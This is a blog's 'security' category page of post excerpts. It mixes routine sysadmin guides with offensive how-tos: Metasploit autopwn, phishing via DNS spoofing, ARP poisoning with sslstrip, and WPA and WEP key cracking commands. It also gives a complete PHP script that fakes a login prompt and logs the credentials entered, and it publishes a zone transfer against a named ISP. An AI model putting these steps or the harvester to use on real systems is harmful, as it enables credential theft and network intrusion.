
security

This category contains 24 posts

Web based Session Hijacking attacks

In session hijacking, an interceptor uses a man-in-the-middle attack to steal session-dependent attributes (such as cookies) of an unsuspecting user who logs in to a web site, in order to gain unauthorised access and browse private content. I don’t encourage computer hacking as it is illegal, but I write this article for educational purposes … Continue reading

Using m0n0wall to Create a WiFi Captive Portal

m0n0wall is a very powerful firewall based on FreeBSD. For the Captive Portal setup, I used: 1. a diskless PC with 2x Ethernet ports 2. an Access Point 3. a Broadband ADSL+2 router 4. a switch 5. a compact flash card (from my canon ixus:) 6. my linux laptop to flash the image on … Continue reading

Green Technology – Computing

You want to save money on Electricity? Use Green Technology! I have successfully implemented the Wake-On-LAN standard over Internet. Now you don’t need to leave your computer on continuously so that you are able to access it remotely. I can help you conserve energy and save money as well. How it Works; … In the … Continue reading

How to use metasploit framework

This is for Educational Purposes only !! This Howto shows how to gain access to a remote PC (Windows XP Pro SP2) by exploiting a known vulnerability with the autopwn tool.
Installation Howto (Ubuntu)
$ sudo apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby
$ sudo apt-get install libreadline-ruby irb ri rubygems
$ sudo apt-get install subversion … Continue reading

How Phishing Works along with Dns Spoofing

This is for Educational Purposes Only!! This post describes how Phishing works. Many howtos exist on the Internet, but they don't do the job silently, and the victim realises that something is wrong … Attacker’s Side IP: 192.168.1.4 1. install ettercap 2. install Apache with PHP support 3. Make sure with the ping command that facebook.com points to 192.168.1.4 or … Continue reading

Opensource IT Security Solutions

Implementation of SSO (Single-Sign-On) procedures according to ADAE’s Requirements for Telcos, ISPs, Banks, etc. SSO Apache Authentication Against Active Directory, SSO Proxy Squid Authentication Against Active Directory, SSO vsftpd Authentication Against Active Directory. Web Content Filtering and Anti Virus Services. Integration of OpenSSH with OpenLDAP, Kerberos, Active Directory standards (SSO) with full logging and replay … Continue reading

ARP Poisoning – mitm against faceb00k, Gma1L, etc using sslstrip

THIS IS FOR EDUCATIONAL PURPOSES ONLY !!! This method doesn't expose any certificate warning to the user, since the SSL connections are turned into plaintext ones. So never use corporate or public LANs or WiFi hotspots to access eshops, your personal email, faceb00k or sensitive data.
0) Install ettercap
root@pilio-laptop:/# apt-get install ettercap
1) we download … Continue reading

C API OpenSSL / libcrypto sample code

#include <stdio.h>
#include <string.h>
#include <openssl/sha.h>
int main() {
    unsigned char ibuf[] = "Hello, World";
    unsigned char obuf[20];
    /* SHA1() takes the input buffer, its length in bytes, and a 20-byte output buffer */
    SHA1(ibuf, strlen((char *)ibuf), obuf);
    int i;
    for (i = 0; i < 20; i++) {
        printf("%02x ", obuf[i]);
    }
    printf("\n");
    return 0;
}
[root@node1 tmp]# gcc pilio.c -Wall -lcrypto -o pilio
[root@node1 tmp]# ./pilio
90 7d 14 fb … Continue reading

THC-Hydra – The ultimate security assessment tool for NW Services

A very fast network logon cracker which supports; AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY (Basic, DIGEST-MD5, NTLM), HTTPS-FORM-GET, HTTPS-FORM-POST, LDAP (Simple), HTTPS-GET, HTTPS-HEAD, ICQ, IMAP (Clear, Login, Plain, CRAM-MD5, CRAM-SHA1, CRAM-SHA256, DIGEST-MD5, NTLM), MS-SQL, MYSQL, NCP, NNTP, PCNFS, POP3 (Clear, APOP, Login, Plain, CRAM-MD5, CRAM-SHA1, CRAM-SHA256, DIGEST-MD5, NTLM), POSTGRES, REXEC, SAP/R3, … Continue reading

WiFi – WPA-PSK Security assessment with Pre-computed hashes

This post is for educational purposes only !!! On my eeepc I reached 36492.90 keys/second
#sudo -i
#apt-get install libssl-dev libpcap0.8-dev
#wget http://wirelessdefence.org/Contents/Files/cowpatty-4.6.tgz
#tar -xzf cowpatty-4.6.tgz
#cd cowpatty-4.6
root@pilio-laptop:/cowpatty/cowpatty-4.6# make
cc -pipe -Wall -DOPENSSL  -O2 -g3 -ggdb   -c -o md5.o md5.c
cc -pipe -Wall -DOPENSSL  -O2 -g3 -ggdb   -c -o sha1.o sha1.c
cc -pipe -Wall -DOPENSSL  -O2 … Continue reading

WiFi WEP key security assessment

++++++++++++++ 1st terminal window +++++++++++++++++
#airmon-ng start wlan0
#airodump-ng --bssid D8:5D:4C:9D:AC:2D --channel 1 -w tp_link mon0
+++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++ 2nd terminal window ++++++++++++++
#aireplay-ng -1 0 -e TP-LINK_9DAC2D -a D8:5D:4C:9D:AC:2D -h 00:E0:4C:83:10:BF mon0
22:10:01  Waiting for beacon frame (BSSID: D8:5D:4C:9D:AC:2D) on channel 1
22:10:01  Sending Authentication Request (Open System) [ACK]
22:10:01  Authentication successful
22:10:01  Sending Association … Continue reading

Streaming & Unified Messaging Solutions

Installation /Configuration of PacketVideo’s Streaming Platform (Solaris8,SPARC) + encoder (windows 2003) installation / configuration using WINNOV’s Videum Quattro acquisition cards with multiple encoded downstreams per source – ideal solution for mobile operators (RTSP) Installation / Configuration of MS Media Server (Windows 2000,2003) + MS encoder Installation / Configuration of Openfire 3.5.2 (unix,linux) integration with MSN, … Continue reading

The Web Server is not sending the required intermediate certificate through a SECURE HTTPS Session

Some system admins forget to configure the intermediate certificate, and the SSL handshake between the browser and the web server then returns "Verify return code: 21 (unable to verify the first certificate)" instead of "Verify return code: 0 (ok)".
# openssl s_client -connect www.vivodi.gr:443 -state
New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-SHA
Server public key is 1024 bit
SSL-Session: … Continue reading

A Simple PHP Authenticator which logs users’ usernames and passwords

<?php
if (!isset($_SERVER['PHP_AUTH_USER'])) {
    header('WWW-Authenticate: Basic realm="Restricted Area"');
    header('HTTP/1.0 401 Unauthorized');
    echo '401 Unauthorized';
    exit;
} else {
    $a=$_SERVER['PHP_AUTH_USER'];
    $b=$_SERVER['PHP_AUTH_PW'];
    $myFile = "./testFile.txt";
    $fh = fopen($myFile, 'a') or die("ferror!!!");
    fwrite($fh, $a);
    fwrite($fh,"\n");
    fwrite($fh, $b);
    fwrite($fh,"\n");
    fwrite($fh,"-------------------\n");
    fclose($fh);
    header('WWW-Authenticate: Basic realm="Restricted Area"');
    header('HTTP/1.0 401 Unauthorized');
    echo '401 Unauthorized';
    exit;
}
?>
# tail -f testFile.txt
------------------- … Continue reading

Apache seems to be eating RAM – How to reduce the memory footprint of apache using an alternative Apache other than Linux’s Pre-Packaged

#./configure \
--with-included-apr \
--prefix=/opt/apache_worker \
--with-mpm=worker --enable-so \
--enable-unique-id \
--enable-proxy --enable-proxy-http --enable-proxy-ftp \
--enable-proxy-ajp --enable-proxy-balancer \
--enable-rewrite --enable-headers --enable-setenvif \
--enable-logio \
--enable-expires \
--enable-ssl \
--enable-deflate --enable-cache --enable-file-cache --enable-mem-cache --enable-disk-cache \
--disable-autoindex --disable-asis --disable-cgi --disable-cgid \
--disable-negotiation --disable-userdir
#make && make install

MySQL Driven Apache NCSA Log Parser – Linux Ansi C (gcc)

mysql> desc apacheLog;
+---------+--------------+------+-----+---------+-------+
| Field   | Type         | Null | Key | Default | Extra |
+---------+--------------+------+-----+---------+-------+
| myDATE  | datetime     | NO   |     | NULL    |       |
| hosts   | varchar(255) | NO   |     | NULL    |       |
| method  | char(4)      | NO   |     | NULL    |       |
| url     | varchar(255) … Continue reading

Encrypted Volumes under Linux / Windows

1. Under Linux use the following procedure:
# modprobe aes
# modprobe twofish
# modprobe cryptoloop
# mkdir $HOME/crypto
# dd if=/dev/urandom of=$HOME/crypto/container.aes bs=1k count=102400
# LOOPDEV=$( losetup -f )
# echo "Our loop device is '$LOOPDEV'"
# losetup -e aes $LOOPDEV $HOME/crypto/container.aes    (insert a strong passphrase)
# mkfs.ext3 -m 0 $LOOPDEV
# tune2fs -i … Continue reading

How to transmit/receive ASCII/BINARY data between 2 hosts using netcat and file descriptors

//Server Side//
[root@node1]# nc -l -p 8080 -vvvvv
listening on [any] 8080 …
//Client Side//
[root@node2]# exec 5<>/dev/tcp/192.168.1.67/8080
[root@node2]# echo "this is a test" >&5
[root@node2]# echo "this is a test" |openssl base64 -e >&5

Authenticate Apache Against Active Directory (SSO) – Eponymous LDAP Bind

// Apache Module //
LoadModule authz_ldap_module modules/mod_authz_ldap.so
// Apache Module //
[Directory "/var/www/html"]
AuthType Basic
# What the users will see as a "title" of the login prompt:
AuthName "Domain Credentials Required"
# use plain LDAP authentication:
AuthzLDAPMethod ldap
# FQDN resolvable hostname (or IP) of the Windows
# AD domain controller:
AuthzLDAPServer 192.168.1.67
# … Continue reading

Authenticate SQUID PROXY against Active Directory (SSO)

Prerequisites:
1) Samba / Winbind sw
2) Kerberos Libraries
3) System is joined to the Active Directory
4) Squid Package
Squid configuration:
auth_param ntlm program /usr/bin/ntlm_auth --helper-protocol=squid-2.5-ntlmssp
auth_param ntlm children 30
auth_param ntlm max_challenge_reuses 0
auth_param ntlm max_challenge_lifetime 2 minutes
auth_param ntlm use_ntlm_negotiate on
auth_param basic program /usr/bin/ntlm_auth --helper-protocol=squid-2.5-basic
auth_param basic children 5
auth_param basic … Continue reading

Apache PKI Implementation

#openssl pkcs12 -clcerts -export -inkey server.key -in server.crt -out clientKey.p12
#openssl pkcs12 -clcerts -nokeys -in clientKey.p12 -out CA_pilio.crt.pem
#cp CA_pilio.crt.pem CA_pilio.crt
// Apache SSL Configuration //
SSLVerifyClient require
SSLVerifyDepth 1
SSLCACertificateFile /etc/pki/tls/certs/CA_pilio.crt
// Apache SSL Configuration //
The clientKey.p12 client SSL key must be loaded in your web browser.

How to fetch user’s SMIME certificate (Public Key) from Active Directory (eponymous bind) using Perl

#!/usr/bin/perl
use Net::LDAP;
use IO::File;
binmode STDOUT;
my $CREATE_CERT = new IO::File "> /tmp/mycert.cer";
$ldap = Net::LDAP->new('10.20.0.145') or die "Could not connect: $@";
$result = $ldap->bind('CN= bind_usr ,OU=System Administrators,OU=Project Management & Support Dpt,OU=Systems Technical Division,OU=EMPLOYEES,DC=CONTOSO,DC=MSFT',password =>'mypass');
die $result->error if $result->code;
# do stuff
$search = $ldap->search(base=>'OU=EMPLOYEES,DC=CONTOSO,DC=MSFT',scope=>'subtree',filter=>'(&(objectclass=user)(objectcategory=Person))');
die $search->error if $search->code;
print "Total entries returned: ",$search->count,"\n";
… Continue reading

HOL GREEK ISP – DNS Misconfiguration Issue

It seems that HOL is vulnerable to DNS AXFR zone transfers for primary, secondary and tertiary domain zones (forward / reverse zones) from unauthorized IP networks!
# dig @ns1.hol.gr hol.gr -t AXFR
; <<>> DiG 9.5.1-P2 <<>> @ns1.hol.gr hol.gr -t AXFR
; (1 server found)
;; global options: printcmd
hol.gr. 7200 IN SOA ns0.hol.gr. hostmaster.hol.gr. … Continue reading

sample integrations

Samples …
